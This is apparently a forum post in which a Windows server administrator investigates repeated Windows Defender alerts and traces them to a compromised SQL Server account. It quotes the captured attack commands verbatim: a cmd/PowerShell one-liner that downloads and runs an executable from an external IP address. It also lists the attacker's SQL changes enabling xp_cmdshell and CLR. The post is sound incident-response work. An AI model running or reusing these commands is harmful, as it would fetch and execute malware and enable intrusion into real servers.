How to find the process that is running PowerShell commands that appear in Windows Defender
On one of our Windows Datacenter 2016, there's an alert that a trojan is trying to install :
The following PowerShell commands are trying to execute at seemingly random hours of the day (always during working hours, one to two times a day, sometimes there are a few days between attempts which makes me think it's embedded in a file that is executed by the users of the machine)
CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, %TEMP%\tzt.exe) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create %TEMP%\tzt.exe
CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe) >> C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & WMIC process call create C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe
So I suppose it's embedded in some kind of other files, or through a network attack, but I don't know how to investigate this to know which service/file is faulty.
Edit :
I checked into the event viewer : system logs and the detections hours by windows defender coincides with the service : App deployment services starting
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Service Control Manager" Guid="{xxx-a6d7-4695-8e1e-xxx012f4}" EventSourceName="Service Control Manager" />
<EventID Qualifiers="16384">7036</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime="2023-03-03T13:36:51.390130000Z" />
<EventRecordID>685207</EventRecordID>
<Correlation />
<Execution ProcessID="708" ThreadID="13796" />
<Channel>System</Channel>
<Computer>xxxx</Computer>
<Security />
</System>
- <EventData>
<Data Name="param1">AppX Deployment Service (AppXSVC)</Data>
<Data Name="param2">running</Data>
<Binary>4100700070005800xx4000000</Binary>
</EventData>
</Event>
In the event viewer > Windows logs > Application I found that the following values are changed at the time Windows defender is triggered :
- TRUSTWORTHY new value ON for database msdb
- 'clr enabled' new value : 1
- 'show advanced options' new value : 1
- ''xp_cmdshell' new value : 1
Comming from user : MSSQL$SAGE100 which is a the sys sql user
So i suppose the user has been compromised and is used to try to issue powershell commands to the vm, I have enabled the logging for successful logins on the sql server to see if the commands are issued through an application or directly from the network.
After another attack yesterday I can confirm that someone is logging from outside with the correct credentials for an sql user of my sql server and uses this user to conduct the attack.